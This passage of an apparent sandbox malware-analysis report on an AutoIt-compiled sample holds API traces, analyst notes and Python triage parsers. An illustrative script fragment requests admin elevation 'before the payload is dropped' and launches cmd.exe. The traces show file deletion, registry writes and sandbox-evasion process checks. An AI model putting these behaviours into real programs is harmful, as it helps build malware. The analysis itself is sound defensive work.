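#cs ----------------------------------------------------------------------------
 AutoIt Version: 3.3.14.5
 #requireadmin   ; inside a comment block: must be ignored
#ce ----------------------------------------------------------------------------
#NoTrayIcon
#RequireAdmin   ; elevation before the payload is dropped
#include <WinAPI.au3>
#include "stage2.au3"
#OnAutoItStartRegister "_Init"
; #pragma compile(x64, false)   ; line comment: ignored
Local $hProc = ShellExecute("cmd.exe")
"""

if __name__ == "__main__":
    r = scan_directives(SAMPLE_SCRIPT)
    for note in triage_notes(r):
        print(note)
    print("includes:", r.includes, "errors:", r.errors)
```

The comment handling matters more than it looks: decompiled injector scripts routinely carry a commented-out copy of an earlier build, so a naive grep for #RequireAdmin over-reports; only the directive at line 6 of the sample survives the scan.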

                                              Control-flow Graph

                                              Text dump of the rendered graph omitted (the report colours its blocks executed / not executed). Function 00EED836: enumerates "\*.*" with FindFirstFileW / FindNextFileW and, for each entry, either deletes it (DeleteFileW), moves it (MoveFileW), or copies it through subcall 00EEDA5C (CopyFileExW), in one branch followed by DeleteFileW; every path ends in FindClose.
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EED8E2
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00EED99D
                                              • MoveFileW.KERNEL32(?,?), ref: 00EED9B0
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00EED9CD
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EED9F7
                                                • Part of subcall function 00EEDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00EED9DC,?,?), ref: 00EEDA72
                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00EEDA13
                                              • FindClose.KERNEL32(00000000), ref: 00EEDA24
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 1946585618-1173974218
                                              • Opcode ID: 9f3c37664641a246655a44521891f3ac5449c2637470a99ef967791dc55917b5
                                              • Instruction ID: 385b7eba6cb53e3e4d6f6d57a9fe87c81d1d71952d1ec9c90f7beaf022eaff6f
                                              • Opcode Fuzzy Hash: 9f3c37664641a246655a44521891f3ac5449c2637470a99ef967791dc55917b5
                                              • Instruction Fuzzy Hash: A9615D31C0518DAECF05FBA1DE429EDB7B5AF54304F2460A9E409B71A2EB716F0ADB50
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EEDBE0
                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00EEDC30
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEDC41
                                              • FindClose.KERNEL32(00000000), ref: 00EEDC58
                                              • FindClose.KERNEL32(00000000), ref: 00EEDC61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: eab6d5af0e8c26182f07d5c72043e4d8a63d4b75a760cf7391037d641f7b51d9
                                              • Instruction ID: a7fcd6076b9e82102bc9c8332128fe4bcbd7a78e4504e3d99b5adf018fef5868
                                              • Opcode Fuzzy Hash: eab6d5af0e8c26182f07d5c72043e4d8a63d4b75a760cf7391037d641f7b51d9
                                              • Instruction Fuzzy Hash: 80315E3100C389AFC300FB64DC918EFB7E8BE91304F44595DF4E9A21A1EB60DA09DB52
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEDCC1
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00EEDCCF
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00EEDCEF
                                              • CloseHandle.KERNELBASE(00000000), ref: 00EEDD9C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: d308c5e2a4dd448d59dcaff37920d45d608664d1c4074685ac13aeafd05d9740
                                              • Instruction ID: e8327a5307bb322cb9516123218d408e1539af74a38c95a75fe18b4c6a854e67
                                              • Opcode Fuzzy Hash: d308c5e2a4dd448d59dcaff37920d45d608664d1c4074685ac13aeafd05d9740
                                              • Instruction Fuzzy Hash: C031D671108344AFD300EF60DC81BAFBBF8AF98354F04052DF589A71A1EBB19949CB92
                                              APIs
                                              • lstrlenW.KERNEL32(?,00EC4686), ref: 00EEE397
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00EEE3A6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EEE3B7
                                              • FindClose.KERNELBASE(00000000), ref: 00EEE3C3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                              • String ID:
                                              • API String ID: 2695905019-0
                                              • Opcode ID: ffd4ef0ffca2acbf6625a9e12052a1196ac459caace05d5c4056eeef19be8b4a
                                              • Instruction ID: ac46b9ff0a69a96923ffd060297e763658d1d6ffb16f2c2414b33b364ebaa30b
                                              • Opcode Fuzzy Hash: ffd4ef0ffca2acbf6625a9e12052a1196ac459caace05d5c4056eeef19be8b4a
                                              • Instruction Fuzzy Hash: 17F0E53041195867C221673CAC0E8EA77BC9E41339B119711F835D32F0D7B4DD955695
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00EA504E,?,00F498D8,0000000C,00EA51A5,?,00000002,00000000), ref: 00EA5099
                                              • TerminateProcess.KERNEL32(00000000,?,00EA504E,?,00F498D8,0000000C,00EA51A5,?,00000002,00000000), ref: 00EA50A0
                                              • ExitProcess.KERNEL32 ref: 00EA50B2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 62e1618ee255adda87bba2ff1dd2bd4fa3f7698ccf288915acfe9dfc188642ef
                                              • Instruction ID: bb92d034864f6fd6fbee2d463a8e6a2f08d351ce582fb85e17d2917719bb8c40
                                              • Opcode Fuzzy Hash: 62e1618ee255adda87bba2ff1dd2bd4fa3f7698ccf288915acfe9dfc188642ef
                                              • Instruction Fuzzy Hash: E6E0B632400548AFDF216F64DD49E993BBAEB89385F019014F915AB162DB35EE42EB90
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00EDE60A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID: X64
                                              • API String ID: 2645101109-893830106
                                              • Opcode ID: fe2d02cf9d64b9a7c4239a51064412d80f276b412de178b78ca11b9e08c491e8
                                              • Instruction ID: fc2a42cfe381cbeb7790972e8cf9d22b630d70e9df9e30747f238f7fdf2de51e
                                              • Opcode Fuzzy Hash: fe2d02cf9d64b9a7c4239a51064412d80f276b412de178b78ca11b9e08c491e8
                                              • Instruction Fuzzy Hash: 0AD0C9B480111DEACF90CB90DC8CDDD737CBB08304F104192F206B2200DB3095499B10

                                              Control-flow Graph

                                              Text dump of the rendered graph omitted (the report colours its blocks executed / not executed). Function 00F0CD16: optionally RegConnectRegistryW, then RegCreateKeyExW; dispatches on the value-type string (REG_SZ, REG_EXPAND_SZ, REG_MULTI_SZ, REG_DWORD, REG_QWORD, REG_BINARY) to one of four RegSetValueExW call sites, and releases the handles with RegCloseKey.
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0CE1C
                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00F1DCD0,00000000,?,00000000,?,?), ref: 00F0CEA3
                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F0CF03
                                              • _wcslen.LIBCMT ref: 00F0CF53
                                              • _wcslen.LIBCMT ref: 00F0CFCE
                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00F0D011
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F0D120
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F0D1AC
                                              • RegCloseKey.KERNELBASE(?), ref: 00F0D1E0
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0D1ED
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F0D2BF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 9721498-966354055
                                              • Opcode ID: 568d254baf895569b6cdcb5ca7631b36416948f389f138297852beaabeaa0a58
                                              • Instruction ID: 46a6cb9e6f3612ccc15ecc2eb6f6289524cf00709768b03f9cbac9cd38c993c5
                                              • Opcode Fuzzy Hash: 568d254baf895569b6cdcb5ca7631b36416948f389f138297852beaabeaa0a58
                                              • Instruction Fuzzy Hash: 2F125A356042019FD714EF14C881A2ABBE5FF88724F15845CF99EAB3A2CB31ED41DB81
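Two records above are worth reading argument by argument rather than by API name alone. In the registry function, each RegSetValueExW site passes the value type as a literal fourth argument, so the trace itself says REG_SZ (00000001), REG_MULTI_SZ (00000007), REG_QWORD (0000000B, with cbData 00000008) and REG_BINARY (00000003), which matches the REG_* strings in the function's string table. In the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW record, the process-enumeration loop is the raw material for the "Tries to detect sandboxes and other dynamic analysis tools (process name ...)" signature. When there are many such records, it is quicker to parse the API bullets programmatically. The script below is an added example, not part of the report or of Joe Sandbox; the sample input is a handful of API lines copied from the records above, the REG_* values are the Win32 registry type constants, and the behaviour patterns it matches (PATTERNS) are my own triage choice, not the sandbox's signature definitions.

```python
import re
from collections import OrderedDict

# One report bullet: "• Api.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:" for calls made inside a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@?]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwType values of RegSetValueExW (Win32 registry value type constants).
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}

# Behaviour patterns: every API in the set must occur as a direct call in one trace.
# This mapping is my own triage choice, not a Joe Sandbox signature definition.
PATTERNS = {
    "process enumeration (Toolhelp32)": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "debugger check": {"IsDebuggerPresent"},
    "self-relaunch via ShellExecuteW": {"ShellExecuteW"},
    "registry write": {"RegCreateKeyExW", "RegSetValueExW"},
    "recursive directory walk": {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"},
}


def parse_report(text):
    """Split report text into per-function API traces, one per 'APIs' header.

    Returns {index: [call, ...]} where call = {api, module, ref, args, subcall}."""
    traces = OrderedDict()
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = len(traces)
            traces[current] = []
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = m.group("args")
            traces[current].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "ref": m.group("ref").upper(),
                "args": [] if args is None else [a.strip() for a in args.split(",")],
                "subcall": m.group("sub").upper() if m.group("sub") else None,
            })
    return traces


def hexarg(args, index):
    """Integer value of argument `index` when the report printed a hex literal, else None ('?')."""
    if index >= len(args):
        return None
    return int(args[index], 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", args[index]) else None


def registry_writes(trace):
    """(ref, REG_* name, cbData) for each RegSetValueExW call; dwType is the 4th
    argument and cbData the 6th, as in the Win32 prototype."""
    out = []
    for c in trace:
        if c["api"] == "RegSetValueExW":
            t = hexarg(c["args"], 3)
            name = "unknown" if t is None else REG_TYPES.get(t, f"type {t}")
            out.append((c["ref"], name, hexarg(c["args"], 5)))
    return out


def match_patterns(trace):
    """Names of PATTERNS whose APIs all appear as direct (non-subcall) calls in the trace."""
    direct = {c["api"] for c in trace if c["subcall"] is None}
    return [name for name, need in PATTERNS.items() if need <= direct]


# Sample input: API bullets copied from three of the records in this report.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00EEDCC1
• Process32FirstW.KERNEL32(00000000,?), ref: 00EEDCCF
• Process32NextW.KERNEL32(00000000,?), ref: 00EEDCEF
• CloseHandle.KERNELBASE(00000000), ref: 00EEDD9C
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0CE1C
• RegCreateKeyExW.KERNELBASE(?,?,00000000,00F1DCD0,00000000,?,00000000,?,?), ref: 00F0CEA3
• _wcslen.LIBCMT ref: 00F0CF53
• RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00F0D011
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F0D120
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F0D1AC
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F0D2BF
• RegCloseKey.ADVAPI32(00000000), ref: 00F0D1ED
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E832EF,?), ref: 00E83355
  • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00EC3C8A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00EC3D5B
"""

if __name__ == "__main__":
    for idx, trace in parse_report(SAMPLE).items():
        print(f"function {idx}: {', '.join(match_patterns(trace)) or 'no pattern'}")
        for ref, kind, size in registry_writes(trace):
            print(f"  RegSetValueExW @ {ref}: {kind}, cbData={size}")
```

Subcall bullets are kept in the trace but excluded from pattern matching, otherwise an API inlined from a callee (the GetFullPathNameW entries in the file-loop records, for instance) would be attributed to every function that calls that helper. Literal arguments are the exception in these traces; most are printed as "?", so decode what is literal and say so rather than guessing the rest.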

                                              Control-flow Graph

                                              Text dump of the rendered graph omitted (the report colours its blocks executed / not executed). Function 00E83E15: the script directive parser, a chain of repeated calls to 00EA919B that dispatches between the directive names listed under Strings; the record lists no Windows API calls of its own.
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 0-1645009161
                                              • Opcode ID: a545f5ec8073244c68bcd4768e15df7c5c7eb329eccd61e7675877ec65a29080
                                              • Instruction ID: ca3989084af63379a56ac2e09041fbb7a459bf4342714203a61b9d86a551d69a
                                              • Opcode Fuzzy Hash: a545f5ec8073244c68bcd4768e15df7c5c7eb329eccd61e7675877ec65a29080
                                              • Instruction Fuzzy Hash: A38105B1A41205BBDB20BF60CD52FEE3BA8AF19704F046014F90D7A1C6EB71EA41D795
                                              APIs
                                              • GetInputState.USER32 ref: 00E8EEB7
                                              • timeGetTime.WINMM ref: 00E8F0B7
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F1D8
                                              • TranslateMessage.USER32(?), ref: 00E8F22B
                                              • DispatchMessageW.USER32(?), ref: 00E8F239
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F24F
                                              • Sleep.KERNELBASE(0000000A), ref: 00E8F261
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                              • String ID:
                                              • API String ID: 2189390790-0
                                              • Opcode ID: 3a3fb17097b577331a88350f3cea0bd74201ffbb28629a6ff05b7b53056bc955
                                              • Instruction ID: 16b408b450ed0509804b39a6d607914c4479550bbe00632216ab8ca35cbfa0d1
                                              • Opcode Fuzzy Hash: 3a3fb17097b577331a88350f3cea0bd74201ffbb28629a6ff05b7b53056bc955
                                              • Instruction Fuzzy Hash: B9322270604341EFD724EF24C844BAAB7E0FF91308F14662AE56DA73A2D771E944DB82

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E835DE
                                              • RegisterClassExW.USER32(00000030), ref: 00E83608
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E83619
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00E83636
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E83646
                                              • LoadIconW.USER32(000000A9), ref: 00E8365C
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E8366B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 4464a5e38c5606d809de5c979a48a73842885b622f9897a0a05c9400417448f7
                                              • Instruction ID: ae7ace1efe367baf2cdd45583b23599c00c71542359346e45d089d4d7652e6b5
                                              • Opcode Fuzzy Hash: 4464a5e38c5606d809de5c979a48a73842885b622f9897a0a05c9400417448f7
                                              • Instruction Fuzzy Hash: 6321C0B5A0131CAFDB40DFA4E889ADDBBB4FB09701F00821AF611A62A0D7B55545EF91

                                              Control-flow Graph

• Graph: entry block 00EC09FB; basic blocks 00EC09FB-00EC0D23; API calls inside the graph: GetFileType, GetLastError, CloseHandle (node/edge list from the interactive graph viewer not reproduced)
                                              APIs
                                                • Part of subcall function 00EC073A: CreateFileW.KERNELBASE(00000000,00000000,?,00EC0AA4,?,?,00000000,?,00EC0AA4,00000000,0000000C), ref: 00EC0757
                                              • GetLastError.KERNEL32 ref: 00EC0B0F
                                              • __dosmaperr.LIBCMT ref: 00EC0B16
                                              • GetFileType.KERNELBASE(00000000), ref: 00EC0B22
                                              • GetLastError.KERNEL32 ref: 00EC0B2C
                                              • __dosmaperr.LIBCMT ref: 00EC0B35
                                              • CloseHandle.KERNEL32(00000000), ref: 00EC0B55
                                              • CloseHandle.KERNEL32(?), ref: 00EC0C9F
                                              • GetLastError.KERNEL32 ref: 00EC0CD1
                                              • __dosmaperr.LIBCMT ref: 00EC0CD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 0afe1bc61dc24e851a55057729ca616145cc61d92a99303a81b91014da71ec2e
                                              • Instruction ID: 6c624c66e7e4ec2687e3c5319010e1af2efcb2ffe623281552415f5aa2829a0d
                                              • Opcode Fuzzy Hash: 0afe1bc61dc24e851a55057729ca616145cc61d92a99303a81b91014da71ec2e
                                              • Instruction Fuzzy Hash: 7CA10732A042188FDF19EFA8D951FAE7BE0AB46324F14125DF811AB3A1C7329D13CB51

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00E8551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E85539
                                                • Part of subcall function 00E851BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E851E1
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E8534B
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EC4BD7
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EC4C18
                                              • RegCloseKey.ADVAPI32(?), ref: 00EC4C5A
                                              • _wcslen.LIBCMT ref: 00EC4CC1
                                              • _wcslen.LIBCMT ref: 00EC4CD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
